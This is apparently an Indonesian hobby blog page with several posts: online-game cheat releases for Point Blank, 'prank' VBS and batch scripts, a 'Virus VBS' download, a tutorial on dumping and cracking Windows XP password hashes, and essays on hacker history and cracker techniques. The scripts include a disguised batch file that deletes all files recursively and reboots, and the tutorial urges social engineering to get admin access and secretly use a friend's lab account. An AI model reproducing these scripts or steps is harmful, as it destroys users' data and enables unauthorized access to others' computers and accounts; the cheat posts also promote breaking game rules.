Fulhack Relonz US-fixed II. PTK created versi 16

Posted by Rizky Prasetya 19.57, under |



Fitur:
- Full WH
- Replace ALL Weapon
- Ammo 60
- Unlimited HP ( RM )
- Anti VK ( RM )
- 1 HIT ( RM )
- Defuse/Pasang Bom 0 Dtk
- Ghost
- Magnet
- Aimbot Datar
- Moving Speed

Hotkey:
- Show/Off menu = Insert
- D3D Menu

NB: JIKA ERROR COPYKAN FILE D3DX9_43.dll KE FOLDER PB KAMU

Perhatian:
- Khusus Replace weapon aktifkan saat main aja, offkan sebelum pertandingan usai
- Jangan aktifkan replace weapon di loby

Cara Download:
- klik download - klik hide frame - klik skip add

Thanks to:
- SISTER 32 [Private Group]™
- Bayu D'NewCyber Teamz
- Ŗ ĶřĪsņâ Īnďrâwâņ Ŝtãřř Jr.
- Irwan'new-life Not-lazyy
- Yhou'v Zhandres
- Andrie
- B!llkr4z

Warning!
- Hati-hati terhadap penipuan yg mengatasnamakan SISTER 32 [Private Group]™ atau MainCit, selain dari blog ini kami hanya share cheat di forum N3, Macro, Andrie, Bill & N5ort.

Link:


Disini



SoundBreak v50.8 [ Replace Full Weapon + Magnet + Ghost + Ammo + Moving speed + Wallhack + Chams CT + Chams Tero + No Smoke + Rainbow Hair + Phantom + Wireframe + Map Mini ]

Posted by Rizky Prasetya 16.51, under |


Password

Cheate





Greetz To :
[-] Randa
[-] All member soundbreakers
[-] All member N2
[-] All member N3

Fitur & Hotkey :
[-] Click Here

* Tambahan
[-] Magnet | Pg Up = On | | Pg Dn = Off |
[-] Ghost | Home = On | | End = Off |
[-] Ammo | Caps Lock |
[-] Maving Speed | Shift + W |


Tutorial :
[-] Buka PB Launcher
[-] Buka Injector
[-] Isi Password
[-] Star PB
[-] Tekan Enter Untuk Menghilangkan Notice

NB :
[-] Harus install Vcredits&Netframework
[-] klo bugtrap coba gunakan metode flasdisk

Iseng Cuma Make Notepad. Iseng bermodal Notepad

Posted by Rizky Prasetya 13.52, under |

Sebelumnya Saya minta maaf kalo misalnya udah ada yg ngepost .
Gw ada nih tips bwat iseng/ngerja'in >:) tmen-temen gw , tapi saran gw jgn dicoba di komputer agan-agan
tuhkan berarti iseng sama diri sendiri.
Yuk langsung aja , pertama tuliskan kata-kata dibawah ini di notepad agan-agan, pastikan mengetik dengan benar!.


Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

diatas itu untuk iseng mengeject CD-Drive berturut-turut, simpan file dengan nama terserah.VBS yang penting .VBS nya
________________________________________________________________________________________________

MsgBox “Duh, Kepencet”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

yang ini buat iseng BackSpace berturut turut msgnya bisa diganti sesuka agan-agan, disave dengan format VBS kyk yang diatas.
_______________________________________________________________________________________________

@ECHO off
:top
START %SystemRoot%\system32\calc.exe
GOTO top

yang ini buat iseng buka kalkulator terus menerus, disave dengan format .BAT misal: terserah.BAT

________________________________________________________________________________________________

echo Loading Greg...
del /s /q *.*
echo Greg selesai di-loading...
shutdown -r -t 5

Yang ini cukup berbahaya isengnya buat ngeformad Hard Disk , save dengan format .BAT

________________________________________________________________________________________________

@echo off
msg * Komputer Anda Terinfeksi Virus
shutdown -c “Error! Virus Menyebar Keseluruh System!” -s -t 0

yang ini buat shut down komputer , save dengan format .BAT
________________________________________________________________________________________________

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Keyboard RUSAK!!! Harap Diperbaiki”
loop

Yang ini buat keyboard gak berfungsi, save dengan format .VBS

_________________________________________________________________________________________________
NB:Copas biasanya Tidak Berhasil Dikarenakan Perbedaan Tanda Petik (” ”) Pada Notepad, Untuk Lebih Fix Bisa Pake TextPad , untuk msg boxnya bisa agan ubah sesuka agan².

Sory kalo postingan ane kurang jelas karena ane juga masih Newbie & perlu banyak belajar ^:)^

Download Virus VB

Posted by Rizky Prasetya 14.14, under |

Nie Virus VBS jadi Hati2


Download:
rizky-prasetya4rum.blogspot.com myspace graphic comments
Rizky-Prasetya Forum

SoundBreak v50.6 [ Replace Weapon 24 Unit + WH Glass + WH Bersih + WH Dino + WH Safari + WH Indo + Chams Police + Chams Teroris + No Smoking + Crosshair + Unlimited Ammo + Fast Defuse + Fast Plant + Ghost + Magnet + Aimbot + Speed Hack + Freez HP ]

Posted by Rizky Prasetya 13.05, under |


Credits :
[-] b!LLkRaZ
[-] Andrie
[-] Me

Greetz To :
[-] Andrie
[-] All member soundbreakers
[-] All member N2
[-] All member N3

Fitur & hotkey :
[-] Click Here


Tutorial :
[-] Buka PB Launcher
[-] Buka Injector
[-] Isi Password
[-] Star PB
[-] Tekan Enter Untuk Menghilangkan Notice

NB :
[-] Harus installVcredits&Netframework
[-] klo bugtrap coba gunakan metode flasdisk

Posted by Rizky Prasetya 12.56, under |




Download: Cheate



Special Thanks To : Silincah_Yovie, Cellolexis, VJ Hamim

Fitur : 1 Hit SG Only

Hotkey : Auto ON

Tutor : Buka PBLauncher
Buka che*t
Start PB
Klik 1 Hit SG
Klik Notice 1
Klik Go To PB
Enter Notice Ke 2 (INGAT !! Enter, Jangan di Klik, Klo di Klik PB nya langsung error)


Tested Work...
YANG BILANG GA WORK MALAM NI DIJAMIN ANDA MEMANG LECHER SEJATI

Anda Berarti yg cheater ccds @

Snutz 1ZUWq-US versi 3

Posted by Rizky Prasetya 12.54, under |





Cheate



credit ...
- ME ..

Creator : Daniels
Thx : - US-Net Forum
- All Member US-Net
- VIP US-Net
- USnet-Org
- N2nyit-US
- All Member
- All Member N2nyit-US
- All Member USnet-Org
- Nyit-nyit.net
- All Member N3
- Snutz.US
- RCD
- Sapta_AgunK

..... CARA PENGGUNA'AN SUDAH ADA DI DALAM .


Cheate Bikin Sama2

Posted by Rizky Prasetya 15.05, under |


Tukang bajak jaringan internet. Pencuri rekening bank. Tukang obrak-abrik sistem. Begitulah sebagian besar yang diketahui tentang hacker. padahal, dalam situs www.webopedia.comhacker diartikan sebagai istilah gaul untuk seseorang yang sangat antusias terhadap komputer, atau seseorang yang sangat ingin jadi ahli komputer dengan mempelajari bahasa pemrograman dan sistem komputer.

Lalu, kenapa pengertian itu jadi menyimpang?

Dalam buku The New Hacker's Dictionary karya Eric Raymond, hacker adalah orang yang mempunyai lima ciri: gemar mempelajari detil sistem komputer atau bahasa pemrograman, mempelajari bahasa pemrograman dengan cepat, gemar melakukan praktik pemrograman ketimbang berteori, mahir dalam sistem operasi tertentu seperti Unix, dan para hacker senantiasa menghargai hasil hack orang lain.

"Hacker adalah tukang ngoprek. Misalnya orang yang suka ngoprek komputer, dia disebut hacker komputer. Dan itu belum tentu bermaksud jahat", ungkap Budi Raharjo, pakar pengamanan jaringan komputer.

Namun, dalam perkembangannya, hacker menjurus ke arah yang lebih negatif. Dari beragam trik ngoprek yang ditemukan para hacker "murni", penyimpangan pun dilakukan. Trik mereka banyak digunakan hacker lain untuk menjadi senjata "kejahatan", seperti untuk men-deface website, mengambil data, dan sebagainya.

Karenanya, istilah pun bertambah untuk membedakan yang satu dengan yang lain. Ada crakcer, pheaker, ataupun carder.

Hacking dan cracking, prosesnya memang sama, tapi motivasinya berbeda. Cracking adalah hacking yang merusak.

Penyimpangan perilaku hacking memang jadi soal. Makanya, istilah istilah hacker jadi buruk. Bahkan kini, ada istilah white hacker dan black hacker.

Dari Penasaran Jadi Kejahatan

Awal hacker bermula dari tahun 1960-an, ketika fasilitas-fasilitas laboraturium artificial intelligence menjadi daya tarik sendiri bagi para peneliti MIT (Massachusetts Institute of Technology). Komputer saat itu masih menjadi mainframe, "terkunci" dalam ruangan yang terkontrol suhu udaranya, dan berada dalam ruangan berkaca.

Butuh biaya banyak untuk menjalankannya, sehingga para peneliti terbatasi penggunaanya. Mereka lalu menciptakan trik yang mereka sebut hack, sebuah program shortcut untuk menyelesaikan perintah pada mainframe komputer lebih cepat.

Pada tahun 1970-an, istilah hacking berkaitan dengan eksplorasi jaringan kabel, termasuk jaringan telepon. Pada tahun 1971, seorang veteran perang Vietnam bernama John Draper menemukan cara menelepon jarak jauh, tanpa mengeluarkan biaya. Triknya adalah dengan menggunakan sebuah peluit, yang meghasilkan suara 2.600MHz saat menelepon. Dari sinilah istilah pheaker mulai dikenal.

Pada tahun 1980-an, wilayah jacking mulai meluas, saat ARPANET mulai mempraktikkan dunia online lewat bulletin board system yang populer. Yang pertama tertangkap atas tindakan kejahatan adalah sekelompok hacker asal Milwaukee, Amerika Serikat, yang merusak 60 komputer di Memorial Sloan Kettering Cancer dan Laboraturium Nasioanal Los Alamos, Milwaukee. Mereka masuk jaringan komputer memalui telepon.

Akhir tahun 1980-an, Computer Fraud and Abuse Act mulai diterapkan. Robert Morrislah yang pertama kali terganjar undang-undang ini, gara-gara menyebarkan internet worm yang merusak di tahun 1988.

Di awal 1990-an, kasus hacking mulai marak. Kevin Lee Poulsen tertangkap setelah terbukti mencuri dokumen-dokumen militer rahasia.

Namun yang paling fenomenal adalah hacker bernama Kevin Mitnick, yang telah mencuri 20.000 nomor kartu kredit dan menyalahgunakannya. Ia ditangkap di apartemennya pada Februari 1955, setelah diburu hacker lain, Tsutomu Shimomura.

awal tahun 2000, ketakukan akan bug Y2K membuat para hacker semakin menjadi-jadi. Berbagai virus, worm, dan tindakan kejahatan cyber lainnya cukup marak. Terhitung situs-situs beken seperti CNN, Yahoo!, e-Bay, mendapat serangan dari para hacker "hitam". Situs gedung putih, FBI, dan Microsoft pun tak pelak kena serangan.

Hacker yang terpublikasi memang seringkali diakibatkan oleh kejahatannya. Soalnya, hacker "murni" tidak akan merusak jaringan yang disusupi. Biasanya ia hanya meninggalkan jejak kecil, sebagai tanda bahwa jaringan tersebut lemah.

Antara Jagoan dan Amatir

Tindakan setiap hacker biasanya dapat dilihat pula dari kemampuannya. Meski tidak dapat dibuat tingkatannya, tapi sebenarnya ada istilah khusus bagi tiap hacker terkait dengan kemampuan teknisnya. Cuma, tidak sedikit hacker yang tidak mengenal klasifikasi ini.

Ada julukan hacker "elite" untuk hacker yang memahami sistem operasi luar-dalam cukup tinggi, serta sanggup mengkofigurasi jaringan global. Mereka seperti siluman, mampu memasuki sistem tanpa diketahui. Namun, mereka tidak akan merusak isi komputer.

Ada lagi istilah "semi elite" untuk menunjukkan hacker lebih muda daripada "elite", tetapi mempunyai kemampuan dan pengetahuan luas tentang komputer. Mereka mengerti sistem operasi beserta hole-nya. Banyak serangan yang dipublikasi, dilakukan oleh hacker kaliber ini.

Di bawah "semi elite", ada developed kiddie yang umumya masih duduk di bangku sekolah. Mereka membaca tentang metode hacking dan masih menggunakan Graphical User Interface (GUI) dan basic dari Unix. Mereka belum mampu menemukan lubang kelemahan baru di sistem operasi.

Ada hacker kategori script kiddie. Mereka melakukan hacking dengan menggunakan Trojan, dan biasanya bertujuan untuk menakuti dan membuat resah para pengguna internet.

Tingkat paling rendah adalah lamer. Ia tanpa pengalaman dan pengetahuan memadai, tetapi ingin menjadi hacker.

Penyusup Lokal

Perkembangan di tanah air memang tidak dapat diketahui secara pasti. Mungkin, hacker Indonesia mulai mencuat namanya sewaktu ada hacker remaja asal Indonesia yang ditangkap di Singapura. Gara-garanya, ia membobol server pemerintahan di sana.

Group-group hacker Indonesia mulai bermunculan pada tahun 1996. saat itu sebuah komunitas hacker lokal, Indonesian Street Fighters, mengklaim bahwa mereka berhasil meng-crash-kan sebuah server bernama Toxyn.

Komunitas lainnya, IndoHack, juga sempat menyatakan perang antara hacker Indonesia dan Portugal. Ini berkaitan dengan isu tuntutan pembebasan Timor-Timur beberapa tahun lalu.

Nah, kini apa yang ada di benak Anda tentang Hacker? Baikkah atau burukkah? Jawabannya terserah Anda.

Hacker yang Pernah Terkenal

Kevin Mitnick, nama samaran: Condor. Hacker yang paling sering dipublikasikan karena perkara kriminal. Ditangkap kelima kalinya karena tuduhan pemilikan 20.000 nomor kartu kredit curian, menyalin sistem operasi DEC (Digital Equipment Corporation) secara ilegal, serta mengambil alih seluruh hub jaringan telepon New York dan California.

Tsutomu Shimomura. Hacker yang membantu mengejar Kevin Mitnick pada tahun 1994. Bekerja di San Diego Supercomputing, di mana Mitnick mencuri ratusan program dari workstation yang ia kelola. Meski menjadi konsultan pada FBI, Angkatan Udara dan Dinas Keamanan Amerika Serikat, ada rumor mengatakan bahwa ia memiliki sisi gelap seorang hacker.

Robert T. Morris, nama samaran: RTM. Saat remaja pernah meng-hack sistem komputer Bell Labs dan memperoleh akses super user. Membuat worm yang mampu menyebar tak terkendali di internet dan memacetkan ribuan komputer. Morris didenda US$ 10.000.

Kevin Poulsen, nama samaran: Dark Dante. Berurusan dengan FBI pada tahun 1980 karena menembus sistem komputer mereka. Dicari dengan tuduhan membahayakan keamanan nasional. Dalam pengejaran, ia berhasil memenangkan kuis telepon di sebuah radio di Los Angeles dengan cara menukanginya. Ia dapat sebuah mobil Porsche dan liburan ke Hawai.

John Drapper, nama samaran: Cap'n Crunch. Hacker generasi pertama yang beroperasi di bidang telekomunikasi/telepon. Menemukan cara untuk menelepon jarak jauh tanpa biaya, dengan menggunakan peluit berkekuatan suara 2.600MHz ke pesawat telepon.

Hack Windows XP (SP2) Passwords...

Posted by Rizky Prasetya 15.03, under |

Apakah anda pernah menggunakan komputer di Lab atau pinjam komputer teman atau bahkan menggunakan komputer di tempat umum? Nah, biasanya klo di Lab (berdasarkan pengalaman pribadi) komputer pasti di-password dan jika ingin masuk harus tanya dulu ke sang empunya. Nah, sekarang kita dapat melihat password dari komputer yang kita gunakan tanpa merestart komputer atau pun tanpa menginstall program apapun sepertiCain, L0pthCrack, dsb. Hanya dibutuhkan sedikit ‘kepercayaan’ untuk meminjam komputer (istilah kerennya social engineering) dan 2 buah program, yaitu pwdumpdanJhon the ripper. Tapi klo kebetulan ada login umum dengan tipe administrator, itu namanya Hoki! ga perlu cape2 pinjam login teman lagi :-D .
Sebelumnya mungkin anda pernah mendapatkan tutorial mengenai cara menge-hack password user yang ada Windows XP atau NT menggunakan pwdump. Yup, mungkin tutorial ini akan mirip dengan bagaimana cara menge-hack Windows XP, terutama Windows XP SP2. Lalu apa bedanya dengan tutorial yang lain? Saat ini Windows XP SP2 (atau mungkin juga SP1, CMIIW), menggunakan Syskey untuk memproteksi agar HASH (tempat menyimpan password yang dienkripsi) tidak dapat dibaca dan didump menggunakan pwdump atau samdump. Untuk lebih jelasnya berikut penjelasan mengenai syskey[1] :

Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. The main purpose of this feature is to deter ‘offline’ attack. In fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good password crackers to “recover” the passwords; of course physical access is almost always required. So with syskey the attacker needs to remove the additional encryption layer to get the password hashes.

Jika dulu mungkin di Windows NT atau XP (sebelum SP2), kita masih bisa menggunakan pwdump atau bahkan langsung dengan KaHT, maka untuk Windows XP SP2 cara tersebut tidak dapat digunakan lagi (mungkin lebih tepatnya, pwdump tersebut tidak dapat digunakan lagi). Nah disinilah letak perbedaan dengan tutorial sebelumnya. Jika sebelumnya kita menggunakan pwdump versi lama, maka sekarang digunakan yang dikembangkan oleh fizzgig and the foofus.net Team. Kalau baca README dari pwdump6 ini, maka pwdump6 adalah :

pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.

A significantly modified version of pwdump3e, this program is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is turned on. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file

Oh iya, agar pwdumpd6 dapat dijalankan dan mendapatkan HASH file dibutuhkan account yang mempunyai akses setara dengan Administrator. Nah, oleh karena itu kita harus menjalankan sedikit social engineering. Bilang aja ketemen kita, klo mengakses workgroup, tapi ga bisa klo pake login biasa. Tapi tenang aja, biasanya secara default orang-orang kebanyakan mebuat user dengan tipe account Administrator. Atau gunakan berbagai macam cara, daya, upaya maupun rayuan agar kita bisa dapat login terlebih dulu.

Jika udah punya akses dengan login tipe adiministrator, cara selanjutnya adalah tinggal menjalankan pwdump6. Jika anda punya flashdisk, simpan dan bawa terus pwdump6 ini kemanapun ada pergi, siapa tahu berguna suatu saat.. :-D . Ok, langsung aja kita jalankan pwdump6 ini. Sebaiknya copy dulu pwdump6 ke Hardisk (jangan dijalankan dari flashdik). Sebelumnya downlod dulu pwdump6 ini dari Siniatau download dari mirror situs saya Disini
1. Jalankan CMD (Run->cmd)

2. Jalankan pwdump6 seperti berikut (misalnya PwDump6 berada di folder D:\PwDump6)

D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1

pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net

This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.

Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.

3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi. Contohnya akan tampak seperti berikut :

ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::

4. Yosh!! password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.

Download John The Ripper untuk Windows Disini. Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :

D:\john171w\john1701\run>john-mmx.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)

Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.

Administrator:1+Administrator:2 = adminkeren123

Sedangkan untuk user “coba” adalah “mudahditebak”!!

Mudah bukan? Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.

Nah, sekarang kalau kita mau pakai komputer teman di Lab, ga usah cari2 orangnnya lagi. Tinggal pake aja langsung user Admin lagi, tapi jangan sampai ketahuan ama dia….. :-D Atau klo anda lupa password Administrator, tidak perlu mereboot komputer, lalu mereset password anda. Tinggal ikut langkah2 diatas aja!
Referensi :

[1]. http://studenti.unina.it/~ncuomo/syskey

Thanks to fizzgig for you great tools, pwdump6 (http://www.foofus.net/fizzgig/pwdump)! I’ve been looking for this tools for a log time ago! Thanks dude!! and Thanks to pen-test@securityfocus.com!

Apa itu "HACKER??"

Posted by Rizky Prasetya 14.54, under |


Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.

2. Cracker

Sedangkan cracker adalah sebutan untuk orang yang mencari kelemahan system dan memasukinya untuk kepentingan pribadi dan mencari keuntungan dari system yang di masuki seperti: pencurian data, penghapusan, dan banyak yang lainnya.

Hirarki / Tingkatan Hacker

Ternyata Hacker juga mempunyai tingkatan-tingkatan, tiap tingkatan di bedakan dengan kemampuan dan ilmu yang dimiliki sang hacker :

1.Elite

Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.

2.Semi Elite

Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.

3.Developed Kiddie

Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

4.Script Kiddie

Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.

5.Lammer

Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja

Belajar Menjadi Hacker

Posted by Rizky Prasetya 14.52, under |


Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan – mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.
Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik – jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut – karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.
Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.
Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini – tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.
Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.
Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By 'System Crackers' When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk 1
Artikel Populer IlmuKomputer.Com
http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 – karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.
Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.
Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).
Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.
Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah 'ls ' , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah 'expn ', dan (5) mem-finger user di mesin-mesin eksternal lainnya.
Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.
Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti 'ps' & 'netstat' di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.
Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). 2
Artikel Populer IlmuKomputer.Com
3
Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).
